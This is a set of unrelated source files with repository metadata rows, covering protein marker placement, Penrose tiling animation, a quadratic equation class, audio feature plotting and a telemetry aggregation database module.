if "Cog4_5" not in marker_sets:
s=new_marker_set('Cog4_5')
marker_sets["Cog4_5"]=s
s= marker_sets["Cog4_5"]
mark=s.place_marker((588.485, 467.51, 580.572), (0, 0, 0.8), 17.1475)
if "Cog4_6" not in marker_sets:
s=new_marker_set('Cog4_6')
marker_sets["Cog4_6"]=s
s= marker_sets["Cog4_6"]
mark=s.place_marker((568.85, 445.881, 581.332), (0, 0, 0.8), 17.1475)
if "Cog4_GFPC" not in marker_sets:
s=new_marker_set('Cog4_GFPC')
marker_sets["Cog4_GFPC"]=s
s= marker_sets["Cog4_GFPC"]
mark=s.place_marker((803.878, 451.525, 686.828), (0, 0, 0.8), 18.4716)
if "Cog4_Anch" not in marker_sets:
s=new_marker_set('Cog4_Anch')
marker_sets["Cog4_Anch"]=s
s= marker_sets["Cog4_Anch"]
mark=s.place_marker((327.354, 426.514, 485.705), (0, 0, 0.8), 18.4716)
if "Cog5_GFPN" not in marker_sets:
s=new_marker_set('Cog5_GFPN')
marker_sets["Cog5_GFPN"]=s
s= marker_sets["Cog5_GFPN"]
mark=s.place_marker((564.085, 463.738, 548.335), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_0" not in marker_sets:
s=new_marker_set('Cog5_0')
marker_sets["Cog5_0"]=s
s= marker_sets["Cog5_0"]
mark=s.place_marker((564.085, 463.738, 548.335), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_1" not in marker_sets:
s=new_marker_set('Cog5_1')
marker_sets["Cog5_1"]=s
s= marker_sets["Cog5_1"]
mark=s.place_marker((570.054, 435.652, 548.879), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_2" not in marker_sets:
s=new_marker_set('Cog5_2')
marker_sets["Cog5_2"]=s
s= marker_sets["Cog5_2"]
mark=s.place_marker((581.715, 410.031, 541.822), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_3" not in marker_sets:
s=new_marker_set('Cog5_3')
marker_sets["Cog5_3"]=s
s= marker_sets["Cog5_3"]
mark=s.place_marker((586.143, 398.93, 515.638), (0.3, 0.3, 0.3), 17.1475)
if "Cog5_GFPC" not in marker_sets:
s=new_marker_set('Cog5_GFPC')
marker_sets["Cog5_GFPC"]=s
s= marker_sets["Cog5_GFPC"]
mark=s.place_marker((510.396, 325.34, 581.286), (0.3, 0.3, 0.3), 18.4716)
if "Cog5_Anch" not in marker_sets:
s=new_marker_set('Cog5_Anch')
marker_sets["Cog5_Anch"]=s
s= marker_sets["Cog5_Anch"]
mark=s.place_marker((662.389, 469.061, 444.913), (0.3, 0.3, 0.3), 18.4716)
if "Cog6_GFPN" not in marker_sets:
s=new_marker_set('Cog6_GFPN')
marker_sets["Cog6_GFPN"]=s
s= marker_sets["Cog6_GFPN"]
mark=s.place_marker((531.698, 373.097, 569.825), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_0" not in marker_sets:
s=new_marker_set('Cog6_0')
marker_sets["Cog6_0"]=s
s= marker_sets["Cog6_0"]
mark=s.place_marker((531.655, 372.726, 569.786), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_1" not in marker_sets:
s=new_marker_set('Cog6_1')
marker_sets["Cog6_1"]=s
s= marker_sets["Cog6_1"]
mark=s.place_marker((549.62, 367.461, 591.423), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_2" not in marker_sets:
s=new_marker_set('Cog6_2')
marker_sets["Cog6_2"]=s
s= marker_sets["Cog6_2"]
mark=s.place_marker((551.204, 373.587, 619.222), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_3" not in marker_sets:
s=new_marker_set('Cog6_3')
marker_sets["Cog6_3"]=s
s= marker_sets["Cog6_3"]
mark=s.place_marker((551.362, 392.47, 640.258), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_4" not in marker_sets:
s=new_marker_set('Cog6_4')
marker_sets["Cog6_4"]=s
s= marker_sets["Cog6_4"]
mark=s.place_marker((563.304, 418.177, 640.91), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_5" not in marker_sets:
s=new_marker_set('Cog6_5')
marker_sets["Cog6_5"]=s
s= marker_sets["Cog6_5"]
mark=s.place_marker((553.102, 441.461, 651.78), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_6" not in marker_sets:
s=new_marker_set('Cog6_6')
marker_sets["Cog6_6"]=s
s= marker_sets["Cog6_6"]
mark=s.place_marker((562.506, 423.833, 673.091), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_GFPC" not in marker_sets:
s=new_marker_set('Cog6_GFPC')
marker_sets["Cog6_GFPC"]=s
s= marker_sets["Cog6_GFPC"]
mark=s.place_marker((516.535, 463.351, 612.193), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_Anch" not in marker_sets:
s=new_marker_set('Cog6_Anch')
marker_sets["Cog6_Anch"]=s
s= marker_sets["Cog6_Anch"]
mark=s.place_marker((610.451, 376.805, 729.065), (0.21, 0.49, 0.72), 18.4716)
if "Cog7_GFPN" not in marker_sets:
s=new_marker_set('Cog7_GFPN')
marker_sets["Cog7_GFPN"]=s
s= marker_sets["Cog7_GFPN"]
mark=s.place_marker((503.731, 456.783, 568.314), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_0" not in marker_sets:
s=new_marker_set('Cog7_0')
marker_sets["Cog7_0"]=s
s= marker_sets["Cog7_0"]
mark=s.place_marker((518.031, 436.448, 558.426), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_1" not in marker_sets:
s=new_marker_set('Cog7_1')
marker_sets["Cog7_1"]=s
s= marker_sets["Cog7_1"]
mark=s.place_marker((551.523, 395.837, 535.75), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_2" not in marker_sets:
s=new_marker_set('Cog7_2')
marker_sets["Cog7_2"]=s
s= marker_sets["Cog7_2"]
mark=s.place_marker((585.909, 355.901, 512.913), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_GFPC" not in marker_sets:
s=new_marker_set('Cog7_GFPC')
marker_sets["Cog7_GFPC"]=s
s= marker_sets["Cog7_GFPC"]
mark=s.place_marker((519.338, 311.221, 519.184), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_Anch" not in marker_sets:
s=new_marker_set('Cog7_Anch')
marker_sets["Cog7_Anch"]=s
s= marker_sets["Cog7_Anch"]
mark=s.place_marker((681.989, 335.544, 476.443), (0.7, 0.7, 0.7), 18.4716)
if "Cog8_0" not in marker_sets:
s=new_marker_set('Cog8_0')
marker_sets["Cog8_0"]=s
s= marker_sets["Cog8_0"]
mark=s.place_marker((545.897, 450.246, 616.395), (1, 0.5, 0), 17.1475)
if "Cog8_1" not in marker_sets:
s=new_marker_set('Cog8_1')
marker_sets["Cog8_1"]=s
s= marker_sets["Cog8_1"]
mark=s.place_marker((537.901, 457.27, 589.219), (1, 0.5, 0), 17.1475)
if "Cog8_2" not in marker_sets:
s=new_marker_set('Cog8_2')
marker_sets["Cog8_2"]=s
s= marker_sets["Cog8_2"]
mark=s.place_marker((533.611, 465.386, 561.546), (1, 0.5, 0), 17.1475)
if "Cog8_3" not in marker_sets:
s=new_marker_set('Cog8_3')
marker_sets["Cog8_3"]=s
s= marker_sets["Cog8_3"]
mark=s.place_marker((534.682, 455.549, 533.733), (1, 0.5, 0), 17.1475)
if "Cog8_4" not in marker_sets:
s=new_marker_set('Cog8_4')
marker_sets["Cog8_4"]=s
s= marker_sets["Cog8_4"]
mark=s.place_marker((542.808, 446.981, 507.012), (1, 0.5, 0), 17.1475)
if "Cog8_5" not in marker_sets:
s=new_marker_set('Cog8_5')
marker_sets["Cog8_5"]=s
s= marker_sets["Cog8_5"]
mark=s.place_marker((552.23, 438.446, 480.705), (1, 0.5, 0), 17.1475)
if "Cog8_GFPC" not in marker_sets:
s=new_marker_set('Cog8_GFPC')
marker_sets["Cog8_GFPC"]=s
s= marker_sets["Cog8_GFPC"]
mark=s.place_marker((520.832, 413.119, 549.794), (1, 0.6, 0.1), 18.4716)
if "Cog8_Anch" not in marker_sets:
s=new_marker_set('Cog8_Anch')
marker_sets["Cog8_Anch"]=s
s= marker_sets["Cog8_Anch"]
mark=s.place_marker((584.557, 460.814, 407.935), (1, 0.6, 0.1), 18.4716)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
| [
"batxes@gmail.com"
] | batxes@gmail.com |
b4720b1d522b94633c5d679037ba07153eac71b2 | c5f998a4f17a5230094fdb705e374b96a5981b42 | /task1v2.py | 901646e68cf4cefc028682a6a778cd38cc0425b0 | [] | no_license | hodasartem/Python-44 | e5a559aec70e1bae6cc3369e14f7af267bd4c214 | 66a44fa5b6e4da4de48da5aa4fe49254a3f3bc13 | refs/heads/main | 2023-08-25T13:04:52.575373 | 2021-09-26T08:54:08 | 2021-09-26T08:54:08 | 410,501,393 | 0 | 0 | null | 2021-09-26T10:16:37 | 2021-09-26T08:59:52 | Python | UTF-8 | Python | false | false | 186 | py | '''
milk == 3
butter == 5
bread == 7
'''
product = input('Insert the product:\n')
shop_items = {
'milk': 3,
'butter': 5,
'bread': 7
}
print(shop_items.get(product.lower(), -1)) | [
"hodasartem777@gmail.com"
] | hodasartem777@gmail.com |
716527aca7bc545f06d76e03edefcf6a532451fe | 61e9f2ffcd2a86319e6be84f971db31b234aa9cb | /src/Continuous_Penrose/test.py | 27cc1382da010f3e598c829abcd86c5e60442fd4 | [
"MIT"
] | permissive | kms70847/Animation | a4d520199907b5d8b080af5984e410a36e942f62 | 784c44edc7b8b1d60d439cc906bbe474ea4d3758 | refs/heads/master | 2021-07-12T23:31:24.805736 | 2021-04-07T20:12:38 | 2021-04-07T20:12:38 | 44,679,946 | 17 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,808 | py | import math
from geometry import Point, midpoint
from PIL import Image, ImageDraw
phi = (1 + math.sqrt(5)) / 2
def exp(radius, angle):
    """Return the Cartesian Point at polar coordinates (radius, angle)."""
    x = radius * math.cos(angle)
    y = radius * math.sin(angle)
    return Point(x, y)
# def kite(a,b,c, depth):
# if depth == 1:
# draw.polygon(a.tuple()+b.tuple()+c.tuple(), outline="black", fill="white")
# else:
# p = midpoint(a,b, (phi-1)/phi)
# q = midpoint(a,c, 1/phi)
# dart(p,q,a, depth-1)
# kite(b,p,q, depth-1)
# kite(b,c,q, depth-1)
# def dart(d,e,f, depth):
# if depth == 1:
# draw.polygon(d.tuple()+e.tuple()+f.tuple(), outline="black", fill="gray")
# else:
# p = midpoint(e,f, (phi-1)/phi)
# dart(p,d,e, depth-1)
# kite(f,p,d, depth-1)
kitefill = "white"
dartfill = "gray"
outline = None
def kite(a,b,c, depth, parent="k"):
if depth <= 1:
if parent == "k" or depth == 1:
draw.polygon(a.tuple()+b.tuple()+c.tuple(), outline=outline, fill=kitefill)
else:
ab = midpoint(a,b, depth)
ac = midpoint(a,c,depth)
draw.polygon(a.tuple()+ab.tuple()+ac.tuple(), outline=outline, fill=kitefill)
draw.polygon(b.tuple() + c.tuple() + ac.tuple() + ab.tuple(), outline=outline, fill=dartfill)
else:
p = midpoint(a,b, (phi-1)/phi)
q = midpoint(a,c, 1/phi)
dart(p,q,a, depth-1, "k")
kite(b,p,q, depth-1, "k")
kite(b,c,q, depth-1, "k")
def dart(d,e,f, depth, parent="d"):
    """Draw a Penrose dart half-triangle with corners d, e, f, deflating it
    recursively ``depth`` times.

    Mirrors kite(): a fractional final depth renders an interpolated split
    between levels, and ``parent`` selects that fractional rendering.
    """
    if depth <= 1:
        if parent == "d" or depth == 1:
            # Leaf: draw the whole triangle as a dart.
            draw.polygon(d.tuple()+e.tuple()+f.tuple(), outline=outline, fill=dartfill)
        else:
            # Fractional leaf under a kite parent: split at points placed a
            # fraction ``depth`` along the f-d and f-e edges.
            fd = midpoint(f,d, depth)
            fe = midpoint(f,e, depth)
            draw.polygon(f.tuple() + fd.tuple() + fe.tuple(), outline=outline, fill=dartfill)
            draw.polygon(d.tuple() + e.tuple() + fe.tuple() + fd.tuple(), outline=outline, fill=kitefill)
    else:
        # Deflation: a golden-ratio point on the e-f edge yields one dart
        # and one kite at the next depth level.
        p = midpoint(e,f, (phi-1)/phi)
        dart(p,d,e, depth-1, "d")
        kite(f,p,d, depth-1, "d")
def bounce(frames):
    """Return a back-and-forth play sequence: the frames forward, the last
    frame held for 12 frames, the frames reversed, then the first frame
    held for 12 frames."""
    sequence = list(frames)
    sequence.extend([frames[-1]] * 12)
    sequence.extend(reversed(frames))
    sequence.extend([frames[0]] * 12)
    return sequence
draw = None  # module-level ImageDraw handle; set by render() for kite()/dart()
def render(frac):
    """Render one frame of the Penrose "sun" pattern at subdivision depth
    ``frac`` and return it as a PIL image.

    NOTE(review): this file is Python 2 code (``print i,`` below); under
    Python 3 ``radius/2`` would be a float and break Image.resize.
    """
    global draw
    radius = 1000
    center = Point(radius, radius)
    img = Image.new("RGB", (radius*2, radius*2), "white")
    draw = ImageDraw.Draw(img)
    # Ten spokes, 36 degrees apart, around the centre of the canvas.
    spokes = [center + exp(radius, math.radians(theta)) for theta in range(0, 360, 36)]
    for i in range(10):
        b = spokes[i]
        c = spokes[(i+1)%len(spokes)]
        if i %2 == 1: b,c = c,b  # alternate orientation so adjacent wedges mirror
        kite(center, b,c,frac)
    # Drawn oversized, then scaled down 4x for antialiasing.
    img = img.resize((radius/2, radius/2), Image.ANTIALIAS)
    return img
import animation
# Build 64 frames sweeping the subdivision depth from 1.0 upward in steps of
# 1/8, then assemble them into a back-and-forth ("bounce") GIF.
frames = []
for i in range(64):
    print i,
    frames.append(render(1 + (i / 8.)))
animation.make_gif(bounce(frames), delay=8)
"kevin.m.smiley@gmail.com"
] | kevin.m.smiley@gmail.com |
d5808f86d9ebf25d4fa6321b5b14b50847bc8414 | 90d3af65fc9900f2abb7eaa7631646856e115da3 | /COMP9021/lecture/quadratic_equation_v5.py | 32e18a6aaeae380a362bf3d9d2dbaab0a24fd8d2 | [] | no_license | Tim-hyx/UNSW-Courses | d414b79b6c5b428be12456ba85e1757ac871535b | b7031ea9ac833b5a396e7938ef73cc335a2e37b7 | refs/heads/main | 2023-07-10T19:48:34.731340 | 2021-08-10T02:39:14 | 2021-08-10T02:39:14 | 300,894,504 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,092 | py | # Written by Eric Martin for COMP9021
'''
Represents a quadratic equation as a class with a, b, c, root_1 and
root_2 as data. By default, a is set to 1 and b and c are set to 0.
The parameters can be changed with the update() function.
Whether the parameters are changed when the equation is created or by a
call to the update() function, a, b and c have to be explictly named.
The roots are automatically computed when the equation is created or
when some parameter is updated.
'''
from math import sqrt
class QuadraticEquationError(Exception):
    """Raised for invalid quadratic-equation parameters (e.g. a == 0)."""
    pass
class QuadraticEquation:
    '''
    >>> eq = QuadraticEquation.__new__(QuadraticEquation)
    >>> QuadraticEquation.__init__(eq, a=0, b=1)
    Traceback (most recent call last):
    ...
    QuadraticEquationError: a cannot be equal to 0.
    >>> eq1 = QuadraticEquation.__new__(QuadraticEquation)
    >>> QuadraticEquation.__init__(eq1)
    >>> eq1.a
    1
    >>> eq1.b
    0
    >>> eq1.c
    0
    >>> eq1.root_1
    0.0
    >>> eq1.root_2
    >>> eq2 = QuadraticEquation.__new__(QuadraticEquation)
    >>> QuadraticEquation.__init__(eq2, b=4)
    >>> eq2.a
    1
    >>> eq2.b
    4
    >>> eq2.c
    0
    >>> eq2.root_1
    -4.0
    >>> eq2.root_2
    0.0
    >>> eq3 = QuadraticEquation.__new__(QuadraticEquation)
    >>> QuadraticEquation.__init__(eq3, a=1, b=3, c=2)
    >>> eq3.a
    1
    >>> eq3.b
    3
    >>> eq3.c
    2
    >>> eq3.root_1
    -2.0
    >>> eq3.root_2
    -1.0
    >>> QuadraticEquation.update(eq3, a=0)
    Traceback (most recent call last):
    ...
    QuadraticEquationError: a cannot be equal to 0.
    >>> QuadraticEquation.update(eq3, b=-1)
    >>> eq3.root_1
    >>> eq3.root_2
    >>> QuadraticEquation.update(eq3, c=0.3, a=0.5)
    >>> eq3.root_1
    0.3675444679663241
    >>> eq3.root_2
    1.632455532033676
    >>>
    >>> # USUAL ALTERNATIVE SYNTAX
    >>>
    >>> QuadraticEquation(a=0, b=1)
    Traceback (most recent call last):
    ...
    QuadraticEquationError: a cannot be equal to 0.
    >>> eq1 = QuadraticEquation()
    >>> eq1.a
    1
    >>> eq1.b
    0
    >>> eq1.c
    0
    >>> eq1.root_1
    0.0
    >>> eq1.root_2
    >>> eq2 = QuadraticEquation(b=4)
    >>> eq2.a
    1
    >>> eq2.b
    4
    >>> eq2.c
    0
    >>> eq2.root_1
    -4.0
    >>> eq2.root_2
    0.0
    >>> eq3 = QuadraticEquation(a=1, b=3, c=2)
    >>> eq3.a
    1
    >>> eq3.b
    3
    >>> eq3.c
    2
    >>> eq3.root_1
    -2.0
    >>> eq3.root_2
    -1.0
    >>> eq3.update(a=0)
    Traceback (most recent call last):
    ...
    QuadraticEquationError: a cannot be equal to 0.
    >>> eq3.update(b=-1)
    >>> eq3.root_1
    >>> eq3.root_2
    >>> eq3.update(c=0.3, a=0.5)
    >>> eq3.root_1
    0.3675444679663241
    >>> eq3.root_2
    1.632455532033676
    '''

    def __init__(self, *, a=1, b=0, c=0):
        """Store the coefficients of a*x^2 + b*x + c = 0 and compute the
        roots.  Raises QuadraticEquationError when a == 0."""
        if a == 0:
            raise QuadraticEquationError('a cannot be equal to 0.')
        self.a = a
        self.b = b
        self.c = c
        self.compute_roots()

    def __repr__(self):
        '''
        >>> QuadraticEquation()
        QuadraticEquation(a=1, b=0, c=0)
        >>> QuadraticEquation(c=-5, a=2)
        QuadraticEquation(a=2, b=0, c=-5)
        >>> QuadraticEquation(b=1, a=-1, c=-1)
        QuadraticEquation(a=-1, b=1, c=-1)
        '''
        return f'QuadraticEquation(a={self.a}, b={self.b}, c={self.c})'

    def __str__(self):
        '''
        >>> print(QuadraticEquation())
        x^2 = 0
        >>> print(QuadraticEquation(c=-5, a=2))
        2x^2 - 5 = 0
        >>> print(QuadraticEquation(b=1, a=-1, c=-1))
        -x^2 + x - 1 = 0
        '''
        # Quadratic term: omit the coefficient when it is 1 or -1.
        if self.a == 1:
            displayed_equation = 'x^2'
        elif self.a == -1:
            displayed_equation = '-x^2'
        else:
            displayed_equation = f'{self.a}x^2'
        # Linear term.  Bug fixes: the b == -1 branch used "-=" on a string
        # (a TypeError at runtime), and the b < 0 branch was missing the
        # spaces around the minus sign.
        if self.b == 1:
            displayed_equation += ' + x'
        elif self.b == -1:
            displayed_equation += ' - x'
        elif self.b > 0:
            displayed_equation += f' + {self.b}x'
        elif self.b < 0:
            displayed_equation += f' - {-self.b}x'
        # Constant term (omitted when zero).
        if self.c > 0:
            displayed_equation += f' + {self.c}'
        elif self.c < 0:
            displayed_equation += f' - {-self.c}'
        return f'{displayed_equation} = 0'

    def compute_roots(self):
        """Set self.root_1 and self.root_2 from the discriminant: both None
        when there is no real root, a single root in root_1 (root_2 None)
        when the discriminant is 0, otherwise root_1 < root_2."""
        delta = self.b ** 2 - 4 * self.a * self.c
        if delta < 0:
            self.root_1 = self.root_2 = None
        elif delta == 0:
            self.root_1 = -self.b / (2 * self.a)
            self.root_2 = None
        else:
            sqrt_delta = sqrt(delta)
            self.root_1 = (-self.b - sqrt_delta) / (2 * self.a)
            self.root_2 = (-self.b + sqrt_delta) / (2 * self.a)

    def update(self, *, a=None, b=None, c=None):
        """Change any subset of the coefficients (keyword-only) and recompute
        the roots.  Raises QuadraticEquationError when a == 0."""
        if a == 0:
            raise QuadraticEquationError('a cannot be equal to 0.')
        if a is not None:
            self.a = a
        if b is not None:
            self.b = b
        if c is not None:
            self.c = c
        self.compute_roots()
if __name__ == '__main__':
    # Run the doctests embedded in the class and method docstrings above.
    import doctest
    doctest.testmod()
| [
"noreply@github.com"
] | Tim-hyx.noreply@github.com |
fa129e88da4e08d94d2ae7cbc77816d05dda9af7 | 4be47041113d9187034ac4ba61a60208ebf9622b | /Audio.py | 79d6e7db70a92f1deb5883bb703aaa9375d31b79 | [] | no_license | BenLehmann12/Audio-Processing- | 92ab019b417e1bafe58d1d35ceddb505e72175c3 | 95c6f6c671a1d6f2a390598a7b3777fa17764285 | refs/heads/master | 2022-11-26T22:45:06.007380 | 2020-08-02T20:14:59 | 2020-08-02T20:14:59 | 268,144,982 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,888 | py | import librosa
import librosa.display
import IPython.display as ipd
import os
import matplotlib.pyplot as plt
import numpy as np
#os.path.exists('Users/Lehman/PycharmProjects/space_oddity.wav') #Made sure the file is set
#print(os.listdir())
path = 'island_music_x.wav'
x, sr = librosa.load(path)
print(x.shape,sr) #x.shape = (276480,) sr = 22050
plt.figure(figsize=(14,5))
librosa.display.waveplot(x, sr=sr)
plt.show()
X = librosa.stft(x)
Xdb = librosa.amplitude_to_db(abs(X))
plt.figure(figsize=(14,5))
librosa.display.specshow(Xdb,sr=sr, x_axis='time',y_axis='log')
plt.colorbar()
plt.show()
#Perceptual Weighting:
freq = librosa.core.fft_frequencies(sr=sr)
mag = librosa.perceptual_weighting(abs(X)**2, freq)
librosa.display.specshow(mag, sr=sr, x_axis='time', y_axis='log')
plt.colorbar()
plt.show()
r = librosa.autocorrelate(x, max_size=6000)
sample = r[:300]
plt.figure(figsize=(14,5))
plt.plot(sample)
plt.show()
#Chroma Features
sound_len = 400
chrom = librosa.feature.chroma_stft(x, sr=sr, hop_length=sound_len)
plt.figure(figsize=(14,5))
librosa.display.specshow(chrom, x_axis='time',y_axis='chroma', hop_length=sound_len)
plt.colorbar()
plt.show()
#Mel-power
S = librosa.feature.melspectrogram(x,sr=sr,n_fft=120)
log = librosa.power_to_db(S, ref=np.max)
plt.figure(figsize=(14,5))
librosa.display.specshow(log,sr=sr,x_axis='time',y_axis='mel')
plt.colorbar()
plt.show()
def Vocal():
X, fr = librosa.load('space_oddity.wav') #Worked With David Bowie's Space Oddity
librosa.display.waveplot(X, sr=fr)
plt.show()
mfc = librosa.feature.mfcc(X,sr=fr)
librosa.display.specshow(mfc,sr=fr, x_axis='time')
plt.show()
n1 = 600
n2 = 700
plt.figure(figsize=(15,4))
plt.plot(X[n1:n2])
plt.show()
zero_cross = sum(librosa.zero_crossings(X[n1:n2], pad=False)) # Zero Crossing is 6
| [
"noreply@github.com"
] | BenLehmann12.noreply@github.com |
bf257165b2f74181970ef391c605e8952b3eaa10 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03324/s989817125.py | f8ce37adb41afe47dfcaf209885260199bbdb52d | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 447 | py | #!/usr/bin/env python3
d, n = map(int, input().split())
if d == 0:
if n == 100:
print(101)
else:
print(n)
elif d == 1:
l = []
if n == 100:
print(10100)
else:
for i in range(1, 100):
l.append(100 * i)
print(l[n-1])
else:
if n == 100:
print(1010000)
else:
l = []
for i in range(1, 101):
l.append(100 * 100 * i)
print(l[n-1]) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
c65c3fafb3849bf153c49e517efd3dc0fdd061aa | 569a7c330511c58276c3bb020de20cd7779d2e37 | /mozaggregator/db.py | 94d4ab8f9e4e61628919c6765470f50bbc05f5c9 | [] | no_license | vitillo/python_mozaggregator | 3b6cbe57baf49b83646624ddcc5042f84d857a07 | 938880ac951edabe444ef7534cd88d6eeffa5c03 | refs/heads/master | 2021-01-10T01:29:22.001471 | 2015-09-25T11:16:29 | 2015-09-25T11:16:29 | 36,069,380 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,462 | py | #!/usr/bin/env python
# encoding: utf-8
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import psycopg2
import pandas as pd
import ujson as json
import boto.rds2
import os
import string
import sql
import config
from moztelemetry.spark import Histogram
from boto.s3.connection import S3Connection
from cStringIO import StringIO
from mozaggregator.aggregator import simple_measures_labels, count_histogram_labels
# Use latest revision, we don't really care about histograms that have
# been removed. This only works though if histogram definitions are
# immutable, which has been the case so far.
histogram_revision_map = {"nightly": "https://hg.mozilla.org/mozilla-central/rev/tip",
"aurora": "https://hg.mozilla.org/releases/mozilla-aurora/rev/tip",
"beta": "https://hg.mozilla.org/releases/mozilla-beta/rev/tip",
"release": "https://hg.mozilla.org/releases/mozilla-release/rev/tip"}
_metric_printable = set(string.ascii_uppercase + string.ascii_lowercase + string.digits + "_-[]")
def get_db_connection_string():
if os.getenv("DB_TEST_URL"):
return os.getenv("DB_TEST_URL")
elif config.USE_PRODUCTION_DB:
s3 = S3Connection()
secret = json.loads(s3.get_bucket(config.BUCKET).get_key(config.SECRET).get_contents_as_string())["password"]
rds = boto.rds2.connect_to_region(config.REGION)
db = rds.describe_db_instances(config.RDS)["DescribeDBInstancesResponse"]["DescribeDBInstancesResult"]["DBInstances"][0]
return "dbname={} user={} password={} host={}".format(db["DBName"], db["MasterUsername"], secret, db["Endpoint"]["Address"])
else:
return "dbname={} user={} password={} host={}".format(config.DBNAME, config.DBUSER, config.DBPASS, config.DBHOST)
def _create_connection(autocommit=True, host_override=None, dbname_override=None):
conn = psycopg2.connect(get_db_connection_string())
if autocommit:
conn.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)
return conn
def submit_aggregates(aggregates, dry_run=False):
_preparedb()
build_id_count = aggregates[0].groupBy(lambda x: x[0][:4]).\
map(lambda x: _upsert_build_id_aggregates(x, dry_run=dry_run)).\
count()
submission_date_count = aggregates[1].groupBy(lambda x: x[0][:3]).\
map(lambda x: _upsert_submission_date_aggregates(x, dry_run=dry_run)).\
count()
_vacuumdb()
return build_id_count, submission_date_count
def _preparedb():
conn = _create_connection()
cursor = conn.cursor()
cursor.execute(sql.query)
def _get_complete_histogram(channel, metric, values):
revision = histogram_revision_map.get(channel, "nightly") # Use nightly revision if the channel is unknown
if metric.startswith("SIMPLE_MEASURES"):
histogram = pd.Series({int(k): v for k, v in values.iteritems()}, index=simple_measures_labels).fillna(0).values
elif metric.startswith("[[COUNT]]_"): # Count histogram
histogram = pd.Series({int(k): v for k, v in values.iteritems()}, index=count_histogram_labels).fillna(0).values
else:
histogram = Histogram(metric, {"values": values}, revision=revision).get_value(autocast=False).values
return map(long, list(histogram))
def _upsert_aggregate(stage_table, aggregate):
key, metrics = aggregate
submission_date, channel, version, application, architecture, os, os_version, e10s = key[:3] + key[-5:]
dimensions = {"application": application,
"architecture": architecture,
"os": os,
"osVersion": os_version,
"e10sEnabled": e10s}
for metric, payload in metrics.iteritems():
metric, label, child = metric
if not set(metric).issubset(_metric_printable):
continue # Ignore metrics with non printable characters...
try:
histogram = _get_complete_histogram(channel, metric, payload["histogram"]) + [payload["sum"], payload["count"]]
except KeyError:
continue
dimensions["metric"] = metric
dimensions["label"] = label
dimensions["child"] = child
json_dimensions = json.dumps(dimensions)
# json.dumps takes care of properly escaping the text but a SQL command
# will first be interpreted as a string literal before being executed.
# This doubles the number of backslashes we need.
json_dimensions = json_dimensions.replace("\\", "\\\\")
stage_table.write("{}\t{}\n".format(json_dimensions, "{" + ",".join([str(long(x)) for x in histogram]) + "}"))
def _upsert_build_id_aggregates(aggregates, dry_run=False):
conn = _create_connection(autocommit=False)
cursor = conn.cursor()
submission_date, channel, version, build_id = aggregates[0]
# Aggregates with different submisssion_dates write to the same tables, we need a lock
cursor.execute("select lock_transaction(%s, %s, %s, %s)", ("build_id", channel, version, build_id))
cursor.execute("select was_processed(%s, %s, %s, %s, %s)", ("build_id", channel, version, build_id, submission_date))
if cursor.fetchone()[0]:
# This aggregate has already been processed
conn.rollback()
return
stage_table = StringIO()
cursor.execute("select create_temporary_table(%s, %s, %s, %s)", ("build_id", channel, version, build_id))
stage_table_name = cursor.fetchone()[0]
for aggregate in aggregates[1]:
_upsert_aggregate(stage_table, aggregate)
stage_table.seek(0)
cursor.copy_from(stage_table, stage_table_name, columns=("dimensions", "histogram"))
cursor.execute("select merge_table(%s, %s, %s, %s, %s)", ('build_id', channel, version, build_id, stage_table_name))
if dry_run:
conn.rollback()
else:
conn.commit()
cursor.close()
conn.close()
def _upsert_submission_date_aggregates(aggregates, dry_run=False):
conn = _create_connection(autocommit=False)
cursor = conn.cursor()
submission_date, channel, version = aggregates[0]
cursor.execute("select was_processed(%s, %s, %s, %s, %s)", ("submission_date", channel, version, submission_date, submission_date))
if cursor.fetchone()[0]:
# This aggregate has already been processed
conn.rollback()
return
stage_table = StringIO()
cursor.execute("select create_temporary_table(%s, %s, %s, %s)", ("submission_date", channel, version, submission_date))
stage_table_name = cursor.fetchone()[0]
for aggregate in aggregates[1]:
_upsert_aggregate(stage_table, aggregate)
stage_table.seek(0)
cursor.copy_from(stage_table, stage_table_name, columns=("dimensions", "histogram"))
cursor.execute("select merge_table(%s, %s, %s, %s, %s)", ("submission_date", channel, version, submission_date, stage_table_name))
if dry_run:
conn.rollback()
else:
conn.commit()
cursor.close()
conn.close()
def _vacuumdb():
conn = _create_connection()
conn.set_isolation_level(0)
cursor = conn.cursor()
cursor.execute("vacuum")
cursor.close()
conn.close()
| [
"ra.vitillo@gmail.com"
] | ra.vitillo@gmail.com |
